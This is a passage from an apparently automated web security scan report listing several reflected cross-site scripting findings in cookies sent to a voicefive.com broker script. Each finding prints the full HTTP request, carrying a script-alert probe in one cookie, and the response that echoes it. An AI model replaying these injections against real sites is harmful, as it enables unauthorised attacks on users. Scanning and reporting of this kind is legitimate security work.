Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&f54bf<script>alert(1)</script>340b005e8ea; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&f54bf<script>alert(1)</script>340b005e8ea', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 7c55c<script>alert(1)</script>0001538d7dc was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&7c55c<script>alert(1)</script>0001538d7dc; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&7c55c<script>alert(1)</script>0001538d7dc', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 5247f<script>alert(1)</script>be803c30b08 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&5247f<script>alert(1)</script>be803c30b08; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
u May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&5247f<script>alert(1)</script>be803c30b08', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 81a12<script>alert(1)</script>be61ae8b882 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&81a12<script>alert(1)</script>be61ae8b882; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&81a12<script>alert(1)</script>be61ae8b882' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

3.129. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload 247c1<script>alert(1)</script>a0857f057ac was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&247c1<script>alert(1)</script>a0857f057ac; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:49 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949589; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
Exp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&247c1<script>alert(1)</script>a0857f057ac', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

3.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload a9998<script>alert(1)</script>065e4369a02 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&a9998<script>alert(1)</script>065e4369a02; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:48 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949588; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&a9998<script>alert(1)</script>065e4369a02', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

3.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 6dbcb<script>alert(1)</script>b29b024f0ca was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&6dbcb<script>alert(1)</script>b29b024f0ca; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:47 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:47 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949587; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25731

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&6dbcb<script>alert(1)</script>b29b024f0ca', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

3.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 27999<script>alert(1)</script>2c482b2dc1b was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
